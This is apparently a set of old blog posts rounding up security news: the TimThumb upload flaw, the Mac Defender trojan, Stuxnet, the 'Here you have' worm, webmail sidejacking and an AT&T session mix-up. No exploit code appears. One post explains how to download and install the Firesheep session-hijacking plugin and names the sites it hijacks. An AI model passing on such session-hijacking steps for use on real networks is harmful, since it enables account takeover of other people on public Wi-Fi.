An exploit that allows remote attackers to take over your Web site has been found in the extremely popular TimThumb photo-resizing script.

The vulnerability allows third parties to upload and execute arbitrary PHP code in the TimThumb cache directory. Once the PHP code has been uploaded and executed, your site can be compromised however the attacker likes.

We recommend deleting timthumb.php or thumb.php if your site will work without them. If the file exists in a theme or plugin that you’re no longer using you may want to remove the entire theme or plugin directory. After you remove the TimThumb library make sure you check that your site is still working correctly.

This is potentially a massive threat because, literally, millions of Web sites use the Tim Thumb script. And every one of them needs to be updated. Help spread the word.

For complete technical details, visit the post detailing the discovery on Mark Maunder’s site.

Wired points to a couple of recent stories by ZDNet writer Ed Bott marking the first wide-spread trojan infections in the Mac community.

The trojan horse is called Mac Defender. It’s a web pop-up containing a spoof message that tells customers their machines are infected by a virus and they must install anti-virus software. If customers agree to install the software, the program sporadically loads porn websites on their computer.

ZDNet writer Ed Bott was first to spot a long thread of complaints in Apple’s support forums related to Mac Defender, with at least 200 posts of customers reporting they’ve been infected by the malware.

“I’ve done similar searches in the past … [and] I have never found more than one or two in-the-wild reports,” Bott wrote. “This time, the volume is truly exceptional.”

This seems likely to be the first of many instances. As Apple continues to increase market share, malware writers are increasingly likely to focus their efforts on the growing Mac market.

If you haven’t already, update your WordPress installation. It’s really easy. And 3.0.2 provides a “mandatory” security update.

The haiku:

Fixed on day zero
One-click update makes you safe
This used to be hard

One click updates! Reason No. 43,954 that WordPress is better than Joomla or Drupal. Jus’ sayin’.

Robert Graham of Errata Security takes a look at the recent “Web 2.0″ report card compiled by Digital Society, and remarks:

Of the major webmail providers in the U.S., only Gmail is secure against sidejacking attacks. Yahoo Mail and HotMail are insecure, and can be compromised quickly. There are still a lot of HotMail users out there — they are fools.

I talked to the people at Microsoft responsible for fixing this problem ALMOST THREE YEARS AGO. Yet, they’ve done nothing about fixing this huge hole. I just tried it out today — while FireSheep looks a bit funky (it doesn’t correctly show the user name), it easily hacks into HotMail accounts.

Among the best on the card? WordPress!

Oh the mischief this new Firefox plugin is going to cause.

Firesheep adds a sidebar to Mozilla’s Firefox browser that shows when anyone on an open network — such as a coffee shop’s Wi-Fi network — visits an insecure site. “Double-click on someone [in the sidebar] and you’re instantly logged on as them,” said [plugin author Eric] Butler in his short description of his add-on.

Computer World says the Firesheep add-on has been downloaded more than 50,000 times since it was released Sunday. You can download Firesheep from Butler’s Web site. It’s extremely easy to install: just download the .xpi file; drag it to a Firefox window; and restart.

And it’s not just Facebook that Butler’s plugin makes double-click hackable, either. Others include:

• Amazon.com
• Basecamp
• bit.ly
• CNET
• Dropbox
• Facebook
• Flickr
• Foursquare
• Google
• Gowalla
• Windows Live
• Tumblr
• Twitter
• WordPress
• Yahoo
• Yelp
• and others

The plugin is relatively easy to customize, too, meaning that someone with not much more than basic programming skills could easily add other domains to Firesheep’s default list. TechCrunch offers a pretty thorough explanation of how Firesheep works and the plugin’s impact, as well as a possible defense. The truth is, though, using the Internet on a public Wi-Fi network is inherently insecure. But that isn’t news, is it?

The perils of assuming you are anonymous.

ACS: Law, a law firm based in Great Britain that tracks down alleged illegal file sharers for the porn industry, saw its database compromised over the weekend by members of the Internet forum 4chan. In addition to private e-mails and financial data belonging to the law firm, the names of people whom ACS: Law has accused of downloading unauthorized copies of porn movies were also revealed.

That sounds bad enough. But it gets worse.

The blog Torrentfreak reported that among the information posted to the Web were e-mails from people pleading for mercy and “married men who have been confronted with allegations of sharing gay porn.”

Unfortunate, no doubt. Here in Cambodia, such high-tech attempts at tracking down online pirates seem remote. Untoward political speech and affronts to culture still remain the Kingdom’s most offensive topics. A few crude attempts appear to have been made at limiting information in this vein. Though like many law enforcement efforts, that crackdown too proved short-lived and of questionable success. Real-world piracy — that is, the millions of bootleg $2 music and software disks available in every local market — is still a much bigger problem, and costs the country far, far more money.

Iran is fighting off a significant cyber attack, reports The New York Times. The worm, dubbed Stuxnet, represents a hellish breakthrough in the evolution of computer viruses.

Stuxnet, which was first publicly identified several months ago, is aimed solely at industrial equipment made by Siemens that controls oil pipelines, electric utilities, nuclear facilities and other large industrial sites. While it is not clear that Iran was the main target — the infection has also been reported in Indonesia, Pakistan, India and elsewhere — a disproportionate number of computers inside Iran appear to have been struck, according to reports by computer security monitors.

The Christian Science Monitor first reported on Stuxnet in June.  The primary source of the CSM story was computer security expert Ralph Langner, who has been chronicling his research of the virus on his Web site. Langner called Stuxnet the “hack of the century,” and said “Stuxnet is going to be the best studied piece of malware in history.”

Wired magazine, unsurprisingly, has the definitive story.

“It’s the most complex piece of malware we’ve seen in the last five years or more,” says Nicolas Falliere, a code analyst at security firm Symantec. “It’s the first known time that malware is not targeting credit card [data], is not trying to steal personal user data, but is attacking real-world processing systems. That’s why it’s unique and is not over-hyped.”

… Eric Byres, chief technology officer for Byres Security, says the malware isn’t content to just inject a few commands into the PLC [Programmable Logic Controller] but does “massive reworking” of it.

“They’re massively trying to do something different than the processor was designed to do,” says Byres, who has extensive experience maintaining and troubleshooting Siemens control systems. “Every function block takes a fair amount of work to write, and they’re trying to do something quite radically different. And they’re not doing it in a light way. Whoever wrote this was really trying to mess with that PLC. We’re talking man-months, if not years, of coding to make it work the way it did.”

McAfee and others are reporting a new and fast spreading worm, currently dubbed the “Here you have” virus, which spreads via emails with the subject line “Here you have” or “Just for you”.

In the content of the email is a link to a Web site that hosts the virus. Since the actual virus file is not on the user’s computer, it’s very easy to evade anti-virus protection.

Once the virus infects a computer, it then sends itself to all the addresses in the computer user’s address book. The new emails appear as if they were sent by the infected user, which of course they were. Unsuspecting users are apparently clicking on the links by the hundreds of thousands.

Symantec says the new worm also:

• Spread through mapped drives through autorun
• Spread through email by taking contacts from the address book
• Spread through instant messenger
• Disables various security related programs

MacAfee provides the forensics and disinfection tools.

Users in the United States were given access to the Facebook accounts of other people, reports the Associated Press.

“A Georgia mother and her two daughters logged onto Facebook from mobile phones last weekend and wound up in a startling place: strangers’ accounts with full access to troves of private information,” the story says.

The AP does not explain how the mix up happened, but the problem is not with Facebook, apparently. The glitch, “a routing problem,” occurred between the users’ phone and their Internet service provider, AT&T.

Security experts interviewed for the story said they had never heard of a case like this, where users were given access to the wrong account. It’s unknown whether such a mix up is rare, or just rarely reported. Experts agreed that the same flaw could happen with other applications, such as email or blogging services.

READ IT: Network Flaw Causes Scary Web Error

MORE: Ars Technica provides a not-too-technical explanation of what likely happened, including this pithy synopsis:

“So it looks like AT&T did something wrong—even though I wouldn’t call it a “routing” problem—and the company is in the process of fixing things. But Facebook also shares some blame for this situation. Apparently Facebook, like many other sites, doesn’t think the information tied to a user’s account is important enough to protect with something stronger than a clear text cookie.”